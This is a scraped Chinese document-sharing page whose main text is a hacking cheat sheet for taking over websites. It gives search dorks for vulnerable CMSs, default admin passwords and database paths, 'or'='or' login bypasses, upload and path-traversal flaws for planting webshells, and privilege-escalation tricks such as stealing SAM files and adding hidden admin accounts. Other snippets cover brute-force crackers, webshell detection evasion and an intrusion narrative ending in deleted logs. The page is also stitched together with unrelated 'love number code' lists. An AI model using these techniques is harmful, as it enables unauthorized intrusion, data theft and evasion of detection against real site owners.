当前位置:文档之家› 45种可以获得Webshell的程序

45种可以获得Webshell的程序

45种可以获得Webshell的程序
45种可以获得Webshell的程序

45种可以获得Webshell的程序

1:到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2,到Google ,site:https://www.doczj.com/doc/cb8089708.html, inurl:asp

3, 利用挖掘鸡和一个ASP木马.

文件名是login.asp

......

路径组是/manage/

关键词是went.asp

用'or'='or'来登陆

4,这个应该N多人都搞过吧。。

关键字:Co Net MIB Ver 1.0网站后台管理系统

帐号密码为'or'='or'

5.动感购物系统呵呵。想到了明小子

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞6。默认数据库地址blogdata/acblog.asa

关键字:acblog

7. 百度/htdocs

注册里可以直接上传asa文件!

8. /Database/#newasp.mdb

关键词:NewAsp SiteManageSystem Version

9. 用挖掘机

关键字:Powered by WEBBOY

页面:/upfile.asp

10. baidu中搜索关键字Ver5.0 Build 0519

(存在上传漏洞)

11. Upfile_Article.asp bbs/upfile.asp

输入关键字:powered by mypower ,

应该是动什么上传漏洞来着?用的人也比较多

工具明小子挖掘鸡就可以了

12. inurl:winnt\system32\inetsrv\

在google里面输入这个就可以找到很多网站

13. 现在GOOGLE搜索关键字intitle:网站小助手inurl:asp

14. 关键字:首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内流言友情连接本站论坛

挖掘鸡的关键字添setup.asp

15. VBulletin论坛的数据库

默认数据库地址!

/includes/functions.php

工具:

1.网站猎手下载地址:百度Google!

2.Google

关键字:

Powered by: vBulletin Version 3.0.1

Powered by: vBulletin Version 3.0.2

Powered by: vBulletin Version 3.0.3

其中一个就可以了

16

1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart

open source。

这是一个商场系统。

2.网站的最底部分,有个Comersus Open Technologies LC。打开看下~~comersus系统~

猜到,comersus.mdb. 是数据库名

数据库都是放在database/ 后的,

所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。

那样把前一个''store/''除去,再加上database/comersus.mdb 试试

都是默认数据库地址

17.无忧传奇官方站点程序。

1、后台管理地址:http://您的域名/msmiradmin/

或者是http://您的域名/admin.asp

2、默认后台管理帐号:msmir

3、默认后台管理密码:msmirmsmir 或msmir

数据库文件为http://您的域名/msmirdata/msmirArticle.mdb

或者是http://您的域名/msmirdata/msmirArticle.asa

数据库连接文件为***********/Conn.asp

也是默认数据库地址。现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`

18. 百度里输入/skins/default/

19.利用挖掘机

关键机:power by Discuz

路径:/wish.php

配合:

Discuz!论坛wish.php远程包含漏洞

......

20. 上传漏洞.

工具: 当然还是明小子了

网站猎手或者挖掘鸡了。

关键字powered by mypower

检测的页面或文件插入upfile_photo.asp

这个用的人也N多。。

21.新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字"关于本站- 网站帮助- 广告合作- 下载声明- 友情连接- 网站地图- 管理录"

把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp

以源码,软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了

\database\%23newasp.mdb

如:#xzws.mdb 改成%23xzws.mdb

收集的。没试过。。。- -!

22. 通吃所有商城+动力上传系统

使用工具:挖掘鸡v1.1 明小子

商城入侵:

关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成

漏洞页面:upload.asp

upfile_flash.asp

还是上传漏洞拿webshell

23. 注射漏洞

百度搜索ioj's blog

24 动易

列目录

admin_articlerecyclebin.asp

inurl:admin_articlerecyclebin.asp

25.

工具:网站猎手

关键词:inurl:Went.asp

后缀:manage/login.asp

口令:'or'='or'

这软件还不是太熟悉。- -

26.

入侵魔兽私服

需要的工具:ASP木马- -!废话了。

明小子

关键字:All Right Reserved Design:游戏联盟

后台地址:admin/login.asp

数据库的地址:chngame/#chngame.mdb

都默认的。数据库闹下来自己解密吧不多说了。

27.

漏洞是利用管理员iis设置的失误

用baidu 关键字就是比较罕见的脚本名

动网: ReloadForumCache.asp

Leadbbs: makealltopanc.asp

BBSXP: admin_fso.asp

动易: admin_articlerecyclebin.asp

好像比较少吧不太清楚了这个。。

28.

国外站的爆库漏洞

关键字:sad Raven's Guestbook

密码地址:/passwd.dat

后台地址:/admin.php

29.

Discuz 4.1.0跨站漏洞

利用工具:1,W AP浏览器

2,WAP编码转换器

关键字:"intextiscuz! 4.1.0"

WAP浏览器..............................!!

30.

关键字:尚奈克斯

后台路径/system/manage.asp

直接传ASP木马

挖掘机去。。- -!

31.

工具

1:网站猎手

2:大马

关键字:切勿关闭Cookies功能,否则您将不能登录

插入diy.asp

32.

关键字:Team5 Studio All rights reserved

默认数据库:data/team.mdb

剩下的自己搞。不多说了

33.

工具: 挖掘机辅臣数据库读取器

关键字: 企业简介产品展示产品列表

后缀添加: /database/myszw.mdb

后台地址: admin/Login.asp

都默认的。一样。数据库闹下来自己解密码去。就行了。。- -

34.

关键子XXX inurl:Nclass.asp

......

在"系统设置"里写个木马。

会被保存到在config.asp内。

35.

不进后台照样拿动网WEBSHELL

data.asp?action=BackupData 动网数据库备份默认路径

没试过。。。不知道。

36.

工具:网站猎手WebShell

关键字:inurl:Went.asp

后缀:manage/login.asp

弱口令:'or'='or'

也没试过。。。。。。。

37.

关键字owered byCDN_NEWS

随便扫遍文章加一个' ,来试探注入点

后台地址:admin_index.asp

用啥工具我就不说了吧。。。。。。。。。

38.

入侵雷池新闻发布系统

关键字:leichinews

去掉leichinews后面的.

打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上传马.....

进访问uppic anran.asp 登陆马.

----

没试过。汗,收集来的。

39.

工具挖掘机就行了。

关键字ower System Of Article Management Ver 3.0 Build 20030628 默认数据库:database\yiuwekdsodksldfslwifds.mdb

后台地址:自己扫描!

工具明小子。- -!怎么又是他啊。

MD5自己解.........

(NND这个一扫一大堆。大家可以去试试。。)

40.

一、通过GOOGLE搜索找大量注入点

关键字:asp?id=1 gov.jp/ asp?id=

页数:100

语言:想入侵哪个国家就填什么语言吧

42

关键字:Powered by:94KKBBS 2005

利用密码找回功能找回admin

提问:ddddd 回答:ddddd

42.

关键字:inurl:Went.asp

后台为manage/login.asp

后台密码: 'or'=' 或者'or''=''or' 登录进入

默认数据库地址atabase/DataShop.mdb

43.

关键字:****** inurl:readnews.asp

把最后一个/改成%5c ,直接暴库,看密码,进后台随便添加个新闻在标题输入我们的一句话木马

44.

工具:一句话木马

BBsXp 5.0 sp1 管理员猜解器

关键词:powered by bbsxp5.00

进后台,备份一句话马!

45.

关键字:程序核心:BJXSHOP网上开店专家后台:/admin

暴力破解程序

#include #include using namespace std; //破解当前密码,只适合4位纯数字的密码(异或加密)//// ////思想是,首先将原文用密码异或加密(异或加密特点是原文异或得到密文,密文异或得到原文,即解密,即原文异或加密两次便得到原文), ////将得到的密文传入破解密码函数,异或解密成原文,如原文与实际原文相同,则表示密码正解,即破解成功,否则继续对比查找。/// string strp(const string & str,const string & strpw); string pjpw(const string & str,const string & strpw); int main() { string s1="this is a book."; string pass="9987"; string mw=strp(s1,pass);//原文加密并赋值给mw cout<<"密文是:"<

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过

爱情数字密码

爱情数字密码 导读:爱情语录爱情数字密码 1、53881:我想抱抱你 2、74520:其实我爱你 3、7418695:其实你不了解我 4、359258:想我就爱我吧 5、5452830:无时无刻不想你 6、3207778:想和你去吹吹风 7、515206:我已不爱你了 8、825:别爱我 9、987:对不起 10、584520:我發誓我愛你 11、912:就要爱 12、2406:爱死你啦 13、520:我爱你 14、7708801314520:亲亲你抱抱你一生一世我爱你 15、35911:想我久一点 16、809:保齡球 17、99113148875:求求你一生一世别抛弃我 18、756:亲我啦 19、319421:想你就是爱你 20、9213:钟爱一生

21、01925:你依旧爱我 22、70626:请你留下来 23、246:饿死了 24、21184:爱你一辈子 25、3344520:生生世世我愛你 26、220225:爱爱你爱爱我 27、04527:你是我爱妻 28、282:饿不饿 29、2131999:爱你想你久久久 30、21863:爱你到来生 31、59420:我就是爱你 32、0837:你别生气 33、310:先依你 34、259758:爱我就娶我吧 35、369958:神啊救救我吧 36、9958520:救救我吧,我爱你 37、3344587:生生世世不变心 38、53406:我想死你了 39、918:加油吧 40、706519184:请你让我依靠一辈子 41、5620:我很爱你 42、7408695:其实你不了解我

43、174:你去死 44、03456:你相思无用 45、920:就爱你 46、7752:亲亲吾爱 47、8113:伴你一生 48、70885:请你帮帮我 49、0532:你我深爱 50、211701:爱你一千年 51、737420:今生今世爱你 52、73817:情深怕缘浅 53、07868:你吃饱了吗 54、25910:爱我久一点 55、564335:无聊时想想我 56、296:爱走了 57、917:就要亲 58、5420:我只爱你 59、0437:你是神经 60、2031999:爱你想你久久久 61、73807:情深怕缘浅 62、81176:不要在一起了 63、1240:最爱是你 64、85941:帮我告诉他

爱情数字密码大全2020年

爱情数字密码大全2020年导读:爱情语录爱情数字密码大全2020年 1、259695:愛我就了解我 2、737421:今生今世爱你 3、21161:爱你一万年 4、1392010:一生就爱你一人 5、51095:我要你嫁我 6、235:要想你 7、52406:我爱死你啦 8、53517230:我想我已经爱上你 9、53406:我想死你啦 10、20999:爱你久久久 11、5260:我暗恋你 12、5201314:我愛你一生一世 13、57350:我只在乎你 14、54335:无事想想我 15、2137:为你伤心 16、2030999:爱你想你久久久 17、20161:爱你一万年 18、04535:你是否想我 19、74074:去死你去死 20、3456:相思无用

21、619:到永久 22、360:想念你 23、21111:爱你一亿年 24、137:一生情 25、51820:我已不爱你 26、74839:其实不想走 27、5843344521:我发誓生生世世我爱你 28、20110:爱你一百一十年 29、915:就要吻 30、08056:你不理我了 31、1392010:一生就爱你一个 32、21999:爱你久久久 33、241:爱死你 34、51020:我依然爱你 35、441295:谢谢你爱过我 36、2627:爱来爱去 37、2037:为你伤心 38、32062:想念你的爱 39、3344:生生世世 40、721:亲爱你 41、04551:你是我唯一 42、7731:心心相印

43、02746:你恶心死了 44、25873:爱我到今生 45、2925184:爱就爱我一辈子 46、517680:我一定要追你 47、827474:被爱才是幸福 48、3399:长长久久 49、207374:爱你七生七世 50、59420:我就是愛你 51、045617:你是我的氧气 52、20609:爱你到永久 53、1314:一生一世 54、93110:好想见见你 55、70345:请你相信我 56、732016:今生愛你一人 57、540186:我是你女朋友 58、51930:我依旧想你 59、9694482664:我喜欢你 60、0564335:你无聊时想想我 61、147796:一世亲亲就留 62、940194:告诉你一件事 63、25184:爱我一辈子 64、73748196:今生今世伴你左右

常见的webshell检测方法及绕过思路

常见的webshell检测方法及绕过思路 一句话webshell基本结构: 两个步骤:数据的传递、执行所传递的数据 数据的传递&绕过检测 对于数据的传递,我们通常的做法是$_GET/$_POST/$_SERVER/$_COOKIE等获取客户端数据,但是这类关键词直接出现的话,可以很容易回溯到,我们有以下集中方案来解决: 1.利用本身所在的框架 2.利用变种:${“_G”.”ET”}。不过这种不过这种方式也有自身的缺点,可以跟踪“${”;不过这种跟踪又可以通过“$/*a*/{”这种方式绕过(当然其又有被跟踪的可能性)。 3.使用其他数据获取方式来获取数据,譬如$_REQUEST、$GLOBALS[“_GET”]、$_FILE等。 4.人为构造语言缺陷或应用漏洞,并且这种缺陷是不易察觉的,譬如伪造管理 员session等。 数据执行&绕过检测 对于数据执行,我们通常使用的函数或方式有:eval、create_function、``、exec、preg_replace等。当然这类关键词如果直接出现的话,我们的自动化webshell检测脚本可以很轻易的进行识别,目前看我们可以绕过检测的方案较少: 1、通过$a()这种方式来执行函数。不过这种方式也有自身规律在里面,有很多扫描器已经内置了“$.*($.*”这种规则,同样我们可以通过$a/*a*/()这种方式以及相应的变通方式来绕过。(当然其又有被跟踪的可能性) 2、尝试去找到不在黑名单中的函数,或者极其常见的函数。 两句话webshell $a = $_GET[‘a’];eval($a);

爱情数字密码大全2019

爱情数字密码大全2019 27、5843344521:我发誓生生世世我爱你 28、20110:爱你一百一十年 29、915:就要吻 30、08056:你不理我了 31、1392010:一生就爱你一个 32、21999:爱你久久久 33、241:爱死你 34、51020:我依然爱你 35、441295:谢谢你爱过我 36、2627:爱来爱去 37、2037:为你伤心 38、32062:想念你的爱 39、3344:生生世世 40、721:亲爱你 41、04551:你是我唯一 42、7731:心心相印 43、02746:你恶心死了 44、25873:爱我到今生 45、2925184:爱就爱我一辈子

46、517680:我一定要追你 47、827474:被爱才是幸福 48、3399:长长久久 49、207374:爱你七生七世 50、59420:我就是愛你 51、045617:你是我的氧气 52、20609:爱你到永久 53、1314:一生一世 54、93110:好想见见你 55、70345:请你相信我 56、732016:今生愛你一人 57、540186:我是你女朋友 58、51930:我依旧想你 59、9694482664:我喜欢你 60、0564335:你无聊时想想我 61、147796:一世亲亲就留 62、940194:告诉你一件事 63、25184:爱我一辈子 64、73748196:今生今世伴你左右 65、045692:你是我的最爱 66、9494:就是就是 67、356:上网啦

68、51620:我依然爱你 69、7087:请你别走 70、300:想你哦 71、59240:我最爱是你 72、230:爱死你 73、77895:紧紧抱着我 74、912535:求你爱我想我 75、1314925:一生一世就爱我 76、59520:我永远爱你 77、9918875:求求你别抛弃我 78、1372:一厢情愿 79、54033:我是你先生 80、2010000:爱你一万年 81、745421:其实我是爱你 82、54920:我始终爱你

爱情数字密码大全

爱情数字密码大全 导读:本文是关于语录大全的文章,如果觉得很不错,欢迎点评和分享! 1、51120:我依然爱你 2、8834761:漫漫相思只为你 3、20863:爱你到来生 4、3113:想你一生 5、135:要想我 6、0457:你是我妻 7、9950:久久吻你 8、780:牵挂你 9、729:去喝酒 10、9421:就是爱你 11、837:别生气 12、543720:我是真心爱你 13、30920:想你就爱你 14、910:就依你 15、234:爱相随 16、5460:我思念你 17、201701:爱你一千年 18、8384:不三不四

19、5360:我想念你 20、1798:一起走吧 21、25965:爱我就留我 22、095:你找我 23、70:親你 24、2013614:爱你一生又一世 25、574839:我其实不想走 26、8006:不理你了 27、291314:爱就一生一世 28、57410:我心属于你 29、902535:求你爱我想我 30、8050:抱你吻你 31、740:气死你 32、4422335:时时刻刻想想我 33、0487561:你是白痴无药医 34、9908875:求求你别抛弃我 35、1414:要死要死 36、1314920:一生一世就爱你 37、210:爱你哦 38、3013:想你一生 39、706:起来吧 40、8074:把你气死

41、1573:一往情深 42、530184:我想你一辈子 43、530:我想你 44、5240:我爱是你 45、18340:一把扇死你 46、21475:爱你是幸福 47、330335:想想你想想我 48、771880521:亲亲你抱抱你我爱你 49、04567:你是我老妻 50、860:不留你 51、53880:我想抱抱你 52、554528096:我无时无刻伴你左右 53、02825:你爱不爱我 54、065:原谅我 55、765:去跳舞 56、0487:你是白痴 57、54074:我是你妻子 58、510170:我一定要娶你 59、76868:去溜达溜达 60、1930:依旧想你 61、1711:一心一意 62、53770:我想亲亲你

BurpSuite爆破密码

Burp Suite--- Intruder小技巧 作者:小冰50421961[AT] QQ [Dot] com 0x00 题外话 最近朋友送了我少女时代日本巡回演唱会蓝光高清限量版,太激动了!为此表示感谢,所以才有了下文。O(∩_∩)O哈哈~废话不多说,进入正题。 0x01 Intruder—暴力破解 安装要求: Java环境下载地址: https://www.doczj.com/doc/cb8089708.html,/j2se/downloads.html Burp Suite下载地址: https://www.doczj.com/doc/cb8089708.html,/burp/download.html 入门: 安装完成后可以双击可执行的JAR文件,如果不工作,你可以运行在命令提示符或终端输入。命令: Java –jar burpsuite_v1.4.jar 上篇文章对于burp的基本设置,已经说了很明了了,在这我就只提下就行咯。(*^__^*) 嘻嘻…… 配置过程如下: 代理端口配置如下图: 浏览器的配置如下图:

然后把拦截(intercept)功能关闭,因为我们这里不需要进行数据拦截 目标:登陆页面 思路过程:寻找登陆错误关键字—进行暴力破解 打开我们的目标如下图:

我们随意填写账户密码进行登陆,以此获取到登陆的错误信息如下图: 然后返回burp看提交和返回数据信息如下图:

发现我们浏览器所爆出的错误信息在数据包返回的页面中根本无法找到。我想这应该是要pro 版本 才能查看到数据吧 O(∩_∩)O 哈哈~ 开个玩笑!其实细心的童鞋会发现我上图我所标注的地方,HTTP 状态码302—重定向到另外一个url,我们看看第二个url 返回的内容如下图:

(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救,结果认识了一找不到片的基友,00后的,,感觉顿时无语了…………聊天时,他说sqlmap 和burpsuite都很强大…………玩完sqlmap后,就一直想学burpsuite来着,,但是一直都没学,这几天才刚开始完的…………感觉确实强大,能够拦截,查看和修改网站流量………………不废话,开始 目标站,https://www.doczj.com/doc/cb8089708.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接,在网站后加 and 1=1 回车,页面正常,,加and 1=2 ,回车,不正常,,,判断存在sql 注入漏洞(当然存在啊,不然怎么做教程,只是说下如何判断注入) 然后order by 查询字段(是叫做字段吗,我对概念不清楚,虽然我为这还自学了mysql……暂且叫字段吧) 如图,12不正常,11正常,说明字段为11(11之前的都正常)

然后在地址后加入 union select 1,2,3,4,5,6,7,8,9,10,11 from admin,也就是访问 https://www.doczj.com/doc/cb8089708.html,/show_content.asp?id=1361 union select 1,2,3,4,5,6,7,8,9,10,11 from admin(别问我admin哪来的,,微软access数据库默认的表,也不能说是默认的吧,大多都是这样,下面的username和password也是这样),看图吧 看到2 3 没,爆出查询点了,,把2换成username,3换成password(当然2换成password,3为username也行),回车,如图 username为admin,,密码为MD5加密的值,拿去解密,如图

暴力破解密码C语言

#include"stdio.h" #include"time.h" #include"stdlib.h" #include"malloc.h" #include"string.h" int main() { char a[10],b[]={"000000"},c[]={"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU VWXYZ"}; int d[6]; clock_t start,finish; double TheTimes; do { printf("请输入六位密码:"); gets(a); if(a[6]=='\0') { break; } printf("ERROR\n" ); } while(1); start=clock(); while(1) { for(d[5]=0;d[5]<64;d[5]++) { b[5]=c[d[5]]; for(d[4]=0;d[4]<64;d[4]++) { b[4]=c[d[4]]; for(d[3]=0;d[3]<64;d[3]++) { b[3]=c[d[3]]; for(d[2]=0;d[2]<64;d[2]++) { b[2]=c[d[2]]; for(d[1]=0;d[1]<64;d[1]++) { b[1]=c[d[1]]; for(d[0]=0;d[0]<64;d[0]++)

{ b[0]=c[d[0]]; if(strcmp(a,b)==0) { printf("破解密码得:"); puts(b); finish=clock(); TheTimes=(double)((finish-start)/CLOCKS_PER_SEC); printf("用时%f秒。\n",TheTimes); return(0); } } } } } } } } return(0); }

一次简单但又完整的先拿shell后提权的经历

. 一次简单但又完整的先拿shell后提权的经历 前一段时间看到了易趣购物网站爆出了注入漏洞,注入的关键字是关键字: inurl:Price.asp?anid=,结合系统本身的后台数据库备份生成目录可以自定义漏洞,轻松可以通过备份xxx.asp的目录,然后上传后缀为jpg的一句话木马,菜刀连之即可得到shell。 但是如果是这样我也不会再写此文,在这些购物网站中,数据最重要的当属减肥丰胸等等网站数据,而且这些网站在优化seo时,肯定设置的关键字也是减肥丰胸之类,那么中文标题之中必有此关键字,那我的想法就产生了,我的新的注入关键字产生了nurl:Price.asp?anid= intitle:减肥。 啊d扫描注入点,找到一个注入点https://www.doczj.com/doc/cb8089708.html,/Price.asp?anid=xxx,拿去跑表段字段即可,不过也得注意表段是特有的Cnhww。我一般在渗透的时候,也会用jsky和御剑检测站点,在我查看御剑的结果时发现了一个让我欣喜的结果https://www.doczj.com/doc/cb8089708.html,/shell.asp,明白的一看便知是先人后门,打开发现是一个小马, (原有小马一被我清除,此图是后来补的),复制大马代码保存,即得到shell。 扫描端口发现,网站开启了

连接3389端口发现可以连接, 尝试简单的命令猜解失败后,决定重新利用shell。查看服务器所支持的组件:

发现可以支持fso和wscript.shell,欣喜往外,ipconfig,net user都支持,查看了当前的账户,有一个默认的administrator管理账户。但是net user admin admin /add,没任何反应,net user 发现并没有添加账户成功,这里很纳闷,决定换思路。把网站翻了个遍,发现了一个数据库的链接文件。 通过代码可知,这里数据库使用了acess和mssql两个,mssql数据库连接账号和密码都已知晓,何不利用数据库连接器试一试,然后兴奋的分别用了MSSQL连接器、SQLTools、SQL查询分析器分离版本,但皆以失败而告终,都拒绝连接不上,看来是防火墙对1433端口做了从外到内的限制,悲哀。。。 就在这个时候,忽然想起来,啊d等软件在mssql数据库sa权限下,皆有列目录和执行dos的权限,何不试试,然后用啊d 执行命令net user admin admin /add & net localgroup administrators admin /add,但是好久都没回显,很卡的样子,就又换了hdsi,一举成功。 注意这里建立admin是为了方便检测新否已经建立账户,要做一个好的后门,是要做克隆账户的。心情愉悦的3389连之,为了防止管理员net user查到新建的账户,我建立了隐藏账户,即是admin$,这种账户在cmd中时发现不了的,但是查询用户组还是一览无遗。我当时没在意觉得没什么,然后速度在日志查看器中删除了所有日志,(这个我也不想,不过好似没法删除单一的登陆记录,请大牛指点指点),正在这时,忽然事件查看器中多了一条登录审核信息,我一看管理员来了,吓得我急忙注销电脑,灰溜溜的跑了。。。。 大约过了1个小时吧,我又重新登录,账号还在,管理员确实很马虎额,不过自己可不能再大意了,遂决定建立克隆账户。 然后就用shell上传aio.exe文件,竟然失败,然后用菜刀上传也是失败,真是无语。看来是权限不够,忽然想到3389现在不是支持复制粘贴吗?忽然觉得思路就是被逼出来的,

30秒破解所有密码

案例一:强力查"*"工具 打开软件后,将"X"图标,直接拖曳到需要查看密码的窗口中就可以了 下载地址: https://www.doczj.com/doc/cb8089708.html, 这个不是我的真实密码。。。呵呵 案例二:丢失的ADSL密码 dialupass的使用方法很简单,简单到你只要一运行,就能看到电脑中保存的拨号密码了 下载地址: https://www.doczj.com/doc/cb8089708.html, 我不是ADSL的所以没显示。。哦。。。没有也可以建一个。。。哈哈。。。。刷QB的时候应该很多用途吧

案例三:找到系统管理员的密码 系统里面有很多帐号,如果经常不用就会忘记了,对于这部分密码,要找回来,同样非常麻烦。Mr.cfan 就把networkpasswordrecovery推荐给大家吧。 将软件和汉化包解压至相同目录,运行后就能看到当前系统中的所有帐号信息了。 下载地址: https://www.doczj.com/doc/cb8089708.html, 汉化包: https://www.doczj.com/doc/cb8089708.html, https://www.doczj.com/doc/cb8089708.html, 案例四:让系统对我透明 若是所以的"*"都现出原形,是不是会让你觉得很方便呢?也不顾用拖曳图标了,想看就看,让系统密码 完全“透明”。这可是Mr.cfan强力推荐的软件。同样将软件和汉化包解压至相同目录,运行后,系统就 会自动变得的“透明”,同时,所有“透明”化处理过的程序都会被收集起来 下载地址: https://www.doczj.com/doc/cb8089708.html,

汉化包: https://www.doczj.com/doc/cb8089708.html, 奇怪,我打开什么信息都没有 案例五:5秒内破解Word/Excel密码 千万别以为你把DOC、XLS文档加了个密码,就万事OK了,现在的软件只要几秒就可以将这些密码摧毁! 要掌握快速破解文档密码的关键是要下载到OfficePasswordRemover。然后你要做的就是连上网。点两下鼠标,点击“文件名”后的“打开”按钮,选择加密的文件,然后按下“移除密码”,这时软件会自动连网(看来前提是你的计算机已经连网了)寻找密钥。如果网速够快,只要几秒钟就会生成没有密码的新文件了。软件在联网的时候会自动发送一些文件头数据,不会泄露你的隐私,可以放心时使用。 下载地址: https://www.doczj.com/doc/cb8089708.html, 我自己先新建一个加密doc,,再用这个工具打开。。。

网站拿webshell_经典全集

今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手. 动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到的方法进行了总结和归纳,大体情况有以下十大方面。 注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。 一、直接上传获得 二、添加修改上传类型 三、利用后台管理功能写入 四、利用后台管理向配置文件写 五、利用后台数据库备份及恢复获得 六、利用数据库压缩功能 七、系统 八、系统 九、论坛从后台到的三种方式 本帖隐藏的内容需要回复才可以浏览 一、直接上传获得 这种对和的一些程序比较常见,就是其中一例,直接在心情图标管理上传类型,虽然没有提示,其实已经成功了,上传的文件应该是下,前一阵子的联众游戏站和网易的系统漏洞就可以直接上传文件。文件名是原来的文件名,后台可以可以直接上传文件,上传的文件路径有提示。以及一年前十分流行的漏洞(动网和、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传到网站任意可写目录中,从而拿到网站的管理员控制权限。 二、添加修改上传类型 现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,后台可以添加类型,的后台也可添加类型,通过修改后我们可以直接上传后缀的了,还有一种情况是过滤了,可以添加的文件类型来上传获得。系统的后台,我们可以添加的上传类型,这是的一个特性,最后的哪个只要不是已知的文件类型即可,会将作为来正常运行,从而也可成功拿到。后台获得方法是:在上传类型中增加,注意,后面是有个空格的,然后在前台上传马,当然也要在后面加个空格! 三、利用后台管理功能写入

数字爱情密码表

你依旧是爱我 02746 你恶心死了02825 你爱不爱我 03456 你相思无用 0437 你是神经04517 你是我氧气 0456 你是我的 04567 你是我老妻0457 你是我妻 你是我的最爱 0487 你是白痴你是白痴无药医 好无聊时想想我你我就是一辈子065 原谅我06537 你惹我生气07382 你欺恶怕善0748 你去死吧07868 你吃饱了吧08056 你不理我啦0837 你别生气08376 你别生气了095 你找我098 你走吧 1 字部 1240 最爱是你 1314 一生一世一生一世就爱我 1372 一厢情愿 一生就爱你一个1414 意思意思 147 一世情 1573 一往情深1711 一心一意 2 字部 200 爱你哦 20110 爱你一亿年20160 爱你一万年 20170 爱你一千年 20184 爱你一辈子爱你想你久久久 2037 为你伤心 20475 爱你是幸福20609 爱你到永久 爱你七生七世20863 爱你到来生20999 爱你久久久爱爱你爱爱我230 爱上你234 爱相随 235 爱上我240 爱死你246 饿死了

爱是如此神奇25184 爱我一辈子25873 爱我到今生 25910 爱我久一点爱我就了解我爱我就娶我吧 2627 爱来爱去282 饿不饿爱就爱我一辈子 296 爱走了 3 字部 300 想你哦 30920 想你就爱你想你就是爱你 3013 想你一生 31707 LOVE(把BP机倒过来看) 32012 想念你的爱 32069 想爱你很久 想和你去吹吹风想想你想想我 3344 生生世世3399 长长久久356 上网了 35910 想我久一点3731 真心真意39 THANK YOU 4 字部 谢谢你爱过我 时时刻刻想想我4457 速速回机 456 是我啦 460 思念你 5 字部 505 SOS 我一定要追你510 我依你(我已来) 51020 我依然爱你 51095 我要你嫁我51396 我要睡觉了 514 无意思 我已不爱你了51620 我依然爱你 51820 我已不爱你我一辈子爱你51920 我依旧爱你 51930 我依旧想你520 我爱你我爱你一生一世 520*10000 我爱你一万年我爱你生生世世52094 我爱你到死521 我愿意5230 我爱上你5240 我爱是你

爱情数字密码

爱情数字密码 本文是关于爱情数字密码,仅供参考,希望对您有所帮助,感谢阅读。 1、01925:你依旧爱我 2、7418695:其实你不了解我 3、32102:想念你的爱 4、3731:真心真意 5、0437:你是神经 6、03456:你相思无用 7、917:就要亲 8、246437:爱是如此神奇 9、3207778:想和你去吹吹风 10、7752:亲亲吾爱 11、0532:你我深爱 12、25910:爱我久一点 13、1920:依旧爱你 14、775885:親親我抱抱我 15、3344520:生生世世我愛你 16、21184:爱你一辈子 17、70626:请你留下来 18、73807:情深怕缘浅 19、73817:情深怕缘浅 20、8013:伴你一生 21、9958520:救救我吧,我爱你 22、21863:爱你到来生 23、06537:你惹我生气 24、584520:我發誓我愛你 25、04527:你是我爱妻 26、7086:七零八落 27、5231:我爱上你

